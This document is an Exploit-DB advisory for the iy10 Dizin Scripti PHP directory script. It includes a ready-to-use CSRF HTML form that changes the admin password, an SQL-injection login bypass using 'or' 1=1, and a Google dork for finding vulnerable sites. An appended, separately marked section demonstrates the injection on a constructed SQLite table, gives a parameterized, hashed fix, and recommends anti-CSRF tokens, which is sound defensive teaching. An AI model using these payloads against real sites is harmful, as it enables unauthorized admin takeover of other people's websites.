iy10 Dizin Scripti – Multiple Vulnerabilities

  • Author: KnocKout
    Date: 2015-12-10
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/38927/
  • iy10 Dizin Scripti => Multiple Vulnerabilities (CSRF & Authentication Bypass)
    ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    [+] Author : KnocKout
    [~] Contact : knockout@e-mail.com.tr
    [~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com 
    [~] Sweet People : ZoRLu, ( milw00rm.com ),
    Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon
    KedAns-Dz, b3mb4m
    ###########################################################
    ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    |~Web App. : iy10 Dizin Scripti
    |~Affected Version : All Versions
    |~Software: http://wmscripti.com/php-scriptler/iy10-dizin-scripti.html
    |~RISK : High
    |~Google Keyword :"Sitenizi dizine eklemek için tıklayın !"
    
    ################## ++ CSRF Admin Password Change Exploit ++ ######################################
    
    <html>
    <body>
    <form action="http://[TARGET]/admin/kullaniciayarlar.php" method="POST">
    <input type="hidden" name="kullaniciadi" value="knockout" />
    <input type="hidden" name="sifre" value="password" />
    <input type="hidden" name="Submit" value="Exploit!" />
    	<input type="submit" value="Submit request" />
    </form>
    </body>
    </html>
    
    ################# ++ SQL Injection with Authentication Bypass ++###########################################
    
    http://[TARGET]/admin 
    ID: 'or' 1=1
    PW : 'or' 1=1
    
    ############################################################
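
Why the login input shown above is accepted, and the fix, as an added example that is not part of the advisory or of the script's own code. Assumptions: the query shape, the `admin` table and its columns (named after the form fields `kullaniciadi` and `sifre`), the sample credentials, and SQLite standing in for the script's real database.

```python
import hashlib
import hmac
import os
import sqlite3

PAGE_INPUT = "'or' 1=1"               # the ID / PW value quoted in the advisory
SAMPLE_PW = "S3cret-constructed"      # constructed sample credential


def make_db():
    """Constructed in-memory stand-in for the script's admin table (assumed layout)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (kullaniciadi TEXT, sifre TEXT,"
               " salt BLOB, sifre_hash BLOB)")
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", SAMPLE_PW.encode(), salt, 100_000)
    db.execute("INSERT INTO admin VALUES (?, ?, ?, ?)",
               ("admin", SAMPLE_PW, salt, digest))
    return db


def login_concatenated(db, user, pw):
    """Assumed vulnerable shape: form input is pasted into the SQL text."""
    sql = ("SELECT COUNT(*) FROM admin "
           f"WHERE kullaniciadi='{user}' AND sifre='{pw}'")
    # With PAGE_INPUT the quotes close the literals and the WHERE clause ends
    # in  ... OR ' 1=1' , a string that is truthy for every row.
    return db.execute(sql).fetchone()[0] > 0


def login_parameterized(db, user, pw):
    """Hardened: bound parameter for the lookup, salted hash compared in constant time."""
    row = db.execute("SELECT salt, sifre_hash FROM admin WHERE kullaniciadi = ?",
                     (user,)).fetchone()
    if row is None:
        return False                  # input was treated as data, no such user
    candidate = hashlib.pbkdf2_hmac("sha256", pw.encode(), row[0], 100_000)
    return hmac.compare_digest(candidate, row[1])


if __name__ == "__main__":
    db = make_db()
    print("concatenated query accepts page input: ",
          login_concatenated(db, PAGE_INPUT, PAGE_INPUT))
    print("parameterized query accepts page input:",
          login_parameterized(db, PAGE_INPUT, PAGE_INPUT))
    print("parameterized query accepts real login:",
          login_parameterized(db, "admin", SAMPLE_PW))
```

The CSRF form above is a separate issue: `kullaniciayarlar.php` also needs a per-session anti-CSRF token (and ideally the current password) checked before it changes credentials.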